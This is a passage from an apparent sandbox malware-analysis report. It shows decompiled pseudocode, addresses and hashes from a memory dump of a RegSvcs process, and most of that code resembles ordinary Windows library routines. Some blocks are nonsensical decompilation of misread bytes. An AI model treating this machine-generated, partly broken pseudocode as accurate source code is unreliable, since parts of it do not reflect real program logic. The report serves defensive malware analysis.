											goto L56;
										} else {
											switch( *((intOrPtr*)(_t248 * 4 +  &M018F2959))) {
												case 0:
													__ax =  *0x19b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0190F3E0(__edi,  *0x19b848c, __ax & 0x0000ffff);
														__eax =  *0x19b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0190F3E0(_t329, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x19b8480 & 0x0000ffff = E0190F3E0(__edi,  *0x19b8484,  *0x19b8480 & 0x0000ffff);
													__eax =  *0x19b8480 & 0x0000ffff;
													__eax = ( *0x19b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0190F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0190F3E0(_t329, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t344 = _t344 + 0xc;
													_t329 = _t329 + (_t274 >> 1) * 2 + 2;
													__eflags = _t329;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t329 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0190F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x19b8478 & 0x0000ffff = E0190F3E0(__edi,  *0x19b847c,  *0x19b8478 & 0x0000ffff);
													__eax =  *0x19b8478 & 0x0000ffff;
													__eax = ( *0x19b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x19b6e58 & 0x0000ffff = E0190F3E0(__edi,  *0x19b6e5c,  *0x19b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x19b6e58 & 0x0000ffff;
													__eax = ( *0x19b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t300 = _v16;
													_t316 = _v32;
													L29:
													_t285 = _t285 + 4;
													__eflags = _t285;
													_v56 = _t285;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t300 = _t300 + 1;
									_v16 = _t300;
									__eflags = _t300 - _v48;
								} while (_t300 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t248 =  *(_v60 + _t327 * 4);
						if(_t248 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t248 * 4 +  &M018F2935))) {
							case 0:
								__ax =  *0x19b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t316 =  &_v64;
								_v80 = E018F2E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x19b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x19b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E018DEEF0(0x19b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E018DEB70(__ecx, 0x19b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t222 = _v72;
											__eflags = _t222;
											if(_t222 != 0) {
												L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
											}
											_t223 = _v52;
											__eflags = _t223;
											if(_t223 != 0) {
												__eflags = _t335;
												if(_t335 < 0) {
													L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t223);
													_t223 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t296 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x19b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E018DEB70(__ecx, 0x19b79a0);
										__eax = _v52;
										L36:
										_pop(_t328);
										_pop(_t336);
										__eflags = _v8 ^ _t341;
										_pop(_t286);
										return E0190B640(_t223, _t286, _v8 ^ _t341, _t316, _t328, _t336);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t316 =  &_v36;
									_t283 = E018F2E3E(_t281,  &_v36);
									_t296 = _v36;
									_v76 = _t283;
								}
								if(_t296 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t296;
								}
								goto L14;
							case 6:
								__eax =  *0x19b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x19b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x19b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x19b6e58 & 0x0000ffff;
								__eax = ( *0x19b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t327 = _t327 + 1;
								if(_t327 >= _v48) {
									goto L16;
								} else {
									_t316 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t301 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_pop( *__ecx);
					asm("o16 sub [edi-0x70d81fff], cl");
					 *_t334 =  *_t334 + _t341;
					_pop( *[es:ecx]);
					_t337 = _t334 + 1;
					 *((intOrPtr*)(_t329 - 0x70d9faff)) =  *((intOrPtr*)(_t329 - 0x70d9faff)) - _t301;
					 *_t329 =  *_t329 + _t285;
					_pop(_t289);
					_t249 = _t289;
					 *((intOrPtr*)(_t249 +  &_a1530200459)) =  *((intOrPtr*)(_t249 +  &_a1530200459)) + _t316;
					_t250 = _t248;
					 *_t316 =  *_t316 + _t250;
					 *((intOrPtr*)(_t329 - 0x70d77fff)) =  *((intOrPtr*)(_t329 - 0x70d77fff)) - _t301;
					_t338 = _t334 + 1 + _t337;
					asm("daa");
					_pop( *__ecx);
					 *((intOrPtr*)(_t329 - 0x70d7b1ff)) =  *((intOrPtr*)(_t329 - 0x70d7b1ff)) - _t301;
					_a35 = _a35 + _t249;
					 *__ecx = ds;
					asm("fcomp dword [ebx-0x6d]");
					 *((intOrPtr*)(_t250 +  &_a1546912139)) =  *((intOrPtr*)(_t250 +  &_a1546912139)) + _t334 + 1 + _t337;
					_t292 = _t250;
					_t346 = _t344 + _t301;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x199ff00);
					E0191D08C(_t292, _t329, _t338);
					_v44 =  *[fs:0x18];
					_t330 = 0;
					 *_a24 = 0;
					_t293 = _a12;
					__eflags = _t293;
					if(_t293 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t339 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t306 = _t256 * 0xc;
							_v48 = _t306;
							__eflags = _t293 -  *((intOrPtr*)(_t306 + 0x18a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E0190E5C0(_a8,  *((intOrPtr*)(_t306 + 0x18a1668)), _t293);
									_t346 = _t346 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t339 = E019451BE(_t293,  *((intOrPtr*)(_v48 + 0x18a166c)), _a16, _t330, _t339, __eflags, _a20, _a24);
										_v52 = _t339;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t339;
						__eflags = _t339;
						if(_t339 < 0) {
							__eflags = _t339 - 0xc0000100;
							if(_t339 == 0xc0000100) {
								_t302 = _a4;
								__eflags = _t302;
								if(_t302 != 0) {
									_v36 = _t302;
									__eflags =  *_t302 - _t330;
									if( *_t302 == _t330) {
										_t339 = 0xc0000100;
										goto L76;
									} else {
										_t318 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t318 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t302;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t302) {
											__eflags =  *(_t318 + 0x1c);
											if( *(_t318 + 0x1c) == 0) {
												L106:
												_t339 = E018F2AE4( &_v36, _a8, _t293, _a16, _a20, _a24);
												_v32 = _t339;
												__eflags = _t339 - 0xc0000100;
												if(_t339 != 0xc0000100) {
													goto L69;
												} else {
													_t330 = 1;
													_t302 = _v36;
													goto L75;
												}
											} else {
												_t261 = E018D6600( *(_t318 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t302 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t339 = E018F2C50(_t302, _a8, _t293, _a16, _a20, _a24, _t330);
											L76:
											_v32 = _t339;
											goto L69;
										}
									}
									goto L108;
								} else {
									E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t339 = _a24;
									_t268 = E018F2AE4( &_v36, _a8, _t293, _a16, _a20, _t339);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E018F2C50(_v36, _a8, _t293, _a16, _a20, _t339, 1);
									}
									_v8 = _t330;
									E018F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t339;
					}
					L70:
					return E0191D0D1(_t254);
				}
				L108:
			}

0x018f2584
0x018f2586
0x018f2590
0x018f2596
0x018f2597
0x018f2598
0x018f2599
0x018f259e
0x018f25a4
0x018f25a9
0x018f25ac
0x018f25ae
0x018f25b1
0x018f25b2
0x018f25b5
0x018f25b8
0x018f25bb
0x018f25bc
0x018f25bf
0x018f25c2
0x018f25c5
0x018f25c6
0x018f25cb
0x018f25ce
0x018f25d8
0x018f25dd
0x018f25de
0x018f25e1
0x018f25e3
0x018f25e9
0x018f26da
0x018f26da
0x018f26dd
0x018f26e2
0x01935b56
0x00000000
0x018f26e8
0x018f26f9
0x018f26fb
0x018f26fe
0x018f2700
0x01935b60
0x00000000
0x018f2706
0x018f2706
0x018f270a
0x018f270a
0x018f270d
0x018f2713
0x018f2716
0x018f2718
0x018f271c
0x018f271e
0x01935b6c
0x01935b6f
0x01935b7f
0x01935b89
0x01935b8e
0x01935b93
0x01935b96
0x01935b9c
0x01935ba0
0x01935ba3
0x01935bab
0x01935bb0
0x01935bb3
0x01935bb3
0x01935ba3
0x018f2724
0x018f2726
0x018f2729
0x018f272c
0x018f279d
0x018f279d
0x018f27a0
0x018f27a2
0x00000000
0x018f272e
0x018f272e
0x018f2731
0x018f2734
0x018f2734
0x018f2736
0x01935bc1
0x01935bc1
0x01935bc4
0x00000000
0x01935bca
0x01935bca
0x01935bcd
0x00000000
0x01935bd3
0x00000000
0x01935bd3
0x01935bcd
0x018f273c
0x018f273c
0x018f2742
0x018f2747
0x018f274a
0x018f274d
0x018f2750
0x00000000
0x018f2756
0x018f2756
0x00000000
0x018f2902
0x018f2908
0x018f290b
0x00000000
0x018f2911
0x018f291c
0x018f2921
0x00000000
0x018f2921
0x00000000
0x00000000
0x018f2880
0x018f2887
0x018f288c
0x00000000
0x00000000
0x018f2805
0x018f280a
0x018f2814
0x018f2816
0x00000000
0x00000000
0x018f281e
0x018f2821
0x018f2823
0x00000000
0x018f2829
0x018f2829
0x018f2831
0x018f283c
0x018f283e
0x00000000
0x018f283e
0x00000000
0x00000000
0x018f284e
0x018f2850
0x018f2851
0x018f2854
0x018f2857
0x018f285a
0x018f285c
0x018f285d
0x00000000
0x00000000
0x018f275d
0x018f2761
0x00000000
0x018f2767
0x018f276e
0x018f2773
0x018f2773
0x018f2776
0x018f2778
0x018f277e
0x018f277e
0x018f2781
0x018f2781
0x018f2783
0x018f2784
0x00000000
0x00000000
0x01935bd8
0x01935bde
0x01935be4
0x01935be6
0x01935be8
0x01935be9
0x01935bee
0x01935bf8
0x01935bff
0x01935c01
0x01935c04
0x01935c07
0x01935c0b
0x01935c0d
0x01935c0d
0x01935c15
0x01935c18
0x01935c1b
0x01935c1b
0x01935c1e
0x00000000
0x00000000
0x018f28c3
0x018f28c8
0x018f28d2
0x018f28d4
0x018f28d8
0x018f28db
0x01935c26
0x01935c28
0x01935c2d
0x01935c2d
0x00000000
0x00000000
0x01935c34
0x01935c36
0x01935c49
0x01935c4e
0x01935c54
0x01935c5b
0x01935c5d
0x01935c60
0x018f2788
0x018f2788
0x018f278b
0x018f278e
0x018f278e
0x018f278e
0x018f2791
0x00000000
0x00000000
0x018f2756
0x018f2750
0x00000000
0x018f2794
0x018f2794
0x018f2795
0x018f2798
0x018f2798
0x00000000
0x018f2734
0x018f272c
0x018f2700
0x018f25ef
0x018f25ef
0x018f25ef
0x018f25f2
0x018f25f8
0x00000000
0x00000000
0x018f25fe
0x00000000
0x018f28e6
0x018f28ec
0x018f28ef
0x018f28f5
0x018f28f8
0x018f28f8
0x00000000
0x018f28f8
0x00000000
0x00000000
0x018f2866
0x018f2866
0x018f2876
0x018f2879
0x00000000
0x00000000
0x018f27e0
0x018f27e7
0x018f27e9
0x018f27eb
0x01935afd
0x00000000
0x01935afd
0x00000000
0x00000000
0x018f2633
0x018f2638
0x018f263b
0x018f263c
0x018f263e
0x018f2640
0x018f2642
0x018f2647
0x018f2649
0x018f264e
0x018f2650
0x018f2653
0x018f2659
0x018f26a2
0x018f26a7
0x018f26ac
0x018f26b2
0x01935b11
0x01935b15
0x01935b17
0x00000000
0x018f26b8
0x018f26b8
0x018f26ba
0x018f27a6
0x018f27a6
0x018f27a9
0x018f27ab
0x018f27b9
0x018f27b9
0x018f27be
0x018f27c1
0x018f27c3
0x018f27c5
0x018f27c7
0x01935c74
0x01935c79
0x01935c79
0x018f27c7
0x00000000
0x018f26c0
0x018f26c0
0x018f26c3
0x018f26c6
0x018f26c6
0x018f26c9
0x018f26c9
0x00000000
0x018f26c9
0x018f26ba
0x018f265b
0x018f265b
0x018f265e
0x018f2667
0x018f266d
0x018f2677
0x018f267c
0x018f267f
0x018f2681
0x01935b49
0x01935b4e
0x018f27cd
0x018f27d0
0x018f27d1
0x018f27d2
0x018f27d4
0x018f27dd
0x018f2687
0x018f2687
0x018f268a
0x018f268b
0x018f268e
0x018f268f
0x018f2691
0x018f2696
0x018f2698
0x018f269d
0x018f269f
0x00000000
0x018f269f
0x018f2681
0x00000000
0x00000000
0x018f2846
0x00000000
0x00000000
0x018f2605
0x018f260a
0x018f260c
0x018f2611
0x018f2616
0x018f2619
0x018f2619
0x018f261e
0x00000000
0x018f2624
0x018f2627
0x018f2627
0x00000000
0x00000000
0x01935b1f
0x00000000
0x00000000
0x018f2894
0x018f289b
0x018f289d
0x018f28a1
0x01935b2b
0x01935b2e
0x01935b2e
0x018f28a7
0x018f28a9
0x01935b04
0x01935b09
0x01935b09
0x01935b09
0x00000000
0x00000000
0x01935b35
0x01935b3c
0x018f28fb
0x018f28fb
0x018f26cc
0x018f26cc
0x018f26d0
0x00000000
0x018f26d2
0x018f26d2
0x00000000
0x018f26d2
0x00000000
0x00000000
0x018f25fe
0x018f292d
0x018f292f
0x018f2930
0x018f2935
0x018f2937
0x018f2939
0x018f2940
0x018f2942
0x018f2945
0x018f2946
0x018f294c
0x018f294e
0x018f294f
0x018f2950
0x018f2957
0x018f2958
0x018f295a
0x018f2960
0x018f2962
0x018f2963
0x018f2966
0x018f296c
0x018f296f
0x018f2971
0x018f2974
0x018f297b
0x018f297c
0x018f297e
0x018f297f
0x018f2980
0x018f2981
0x018f2982
0x018f2983
0x018f2984
0x018f2985
0x018f2986
0x018f2987
0x018f2988
0x018f2989
0x018f298a
0x018f298b
0x018f298c
0x018f298d
0x018f298e
0x018f298f
0x018f2990
0x018f2992
0x018f2997
0x018f29a3
0x018f29a6
0x018f29ab
0x018f29ad
0x018f29b0
0x018f29b2
0x01935c80
0x018f29b8
0x018f29b8
0x018f29bb
0x018f29c0
0x018f29c5
0x018f29c6
0x018f29c6
0x018f29c9
0x018f29cb
0x00000000
0x00000000
0x018f29cd
0x018f29d0
0x018f29d9
0x018f29db
0x018f29dd
0x018f2a7f
0x018f2a84
0x018f2a87
0x018f2a89
0x01935ca1
0x01935ca3
0x00000000
0x018f2a8f
0x018f2a8f
0x00000000
0x018f2a8f
0x00000000
0x018f29e3
0x018f29e3
0x018f29e3
0x00000000
0x018f29e3
0x018f29dd
0x00000000
0x018f29db
0x018f29e6
0x018f29e9
0x018f29eb
0x018f29ed
0x018f29f3
0x018f29f5
0x018f29f8
0x018f29fa
0x018f2a97
0x018f2a9a
0x018f2a9d
0x018f2add
0x00000000
0x018f2a9f
0x018f2aa2
0x018f2aa5
0x018f2aa8
0x018f2aab
0x01935cab
0x01935caf
0x01935cc5
0x01935cda
0x01935cdc
0x01935cdf
0x01935ce5
0x00000000
0x01935ceb
0x01935ced
0x01935cee
0x00000000
0x01935cee
0x01935cb1
0x01935cb4
0x01935cb9
0x01935cbb
0x00000000
0x01935cbd
0x01935cbd
0x00000000
0x01935cbd
0x01935cbb
0x018f2ab1
0x018f2ab1
0x018f2ac4
0x018f2ac6
0x018f2ac6
0x00000000
0x018f2ac6
0x018f2aab
0x00000000
0x018f2a00
0x018f2a09
0x018f2a0e
0x018f2a21
0x018f2a24
0x018f2a35
0x018f2a3a
0x018f2a3d
0x018f2a42
0x018f2a59
0x018f2a59
0x018f2a5c
0x018f2a5f
0x018f2a5f
0x018f29fa
0x018f29f3
0x018f2a64
0x018f2a64
0x018f2a6b
0x018f2a6b
0x018f2a6d
0x018f2a72
0x018f2a72
0x00000000

Strings

PATH, xrefs: 018F2642, 018F2691

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d6f19abd11a47e00d349df3edd73b3efb1bf2c7a82b7d764b2854ac87b046348
Instruction ID: 3dd4eac5cb182a3648d47a7f4f2fb98a21116f4bd23ae81eb56ec516a88cf219
Opcode Fuzzy Hash: d6f19abd11a47e00d349df3edd73b3efb1bf2c7a82b7d764b2854ac87b046348
Instruction Fuzzy Hash: 0DC19F71E00219DFDB25DF99D980AAEBBB6FF48754F14402DEA05EB290D734EA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 018CC962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E018CC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x19bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E018DEEF0(0x19b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0194F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E018DEB70(_t29, 0x19b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0190B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0194F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x19b70c0; // 0x0
					while(_t38 != 0x19b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x19bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x018cc96a
0x018cc974
0x018cc988
0x018cc98a
0x01937c9d
0x01937c9f
0x01937ca4
0x01937cae
0x01937cf0
0x01937cf5
0x01937cfa
0x018cc992
0x018cc996
0x018cc997
0x018cc998
0x018cc9a3
0x018cc9a3
0x01937cb0
0x01937cb7
0x01937cbb
0x00000000
0x00000000
0x01937cbd
0x01937ce8
0x01937cc5
0x01937cc8
0x01937cca
0x01937cd0
0x01937cd6
0x01937cde
0x01937ce4
0x01937ce4
0x01937cd0
0x00000000
0x01937ce8
0x018cc990
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63dbca8ab5d85332e616c35b123a38b6ea44697c51ef2cf36448d18e80ae0b93
Instruction ID: 46eb889ddac9da64c80a7078b9b6ee2109dd17284b113d2e9e2ed3ce303a83fa
Opcode Fuzzy Hash: 63dbca8ab5d85332e616c35b123a38b6ea44697c51ef2cf36448d18e80ae0b93
Instruction Fuzzy Hash: 8A11E13170474B9BC729AFBCCD85A6BB7E9FBC4615B000629E94A87691DB20ED10C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 018FFAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E018DEEF0(0x19b7b60);
					_t134 =  *0x19b7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x19b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x19b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E018D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01968938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E018CB150();
													}
													_t116 = E01966D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x19b8638; // 0x0
																	_t122 = L018D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
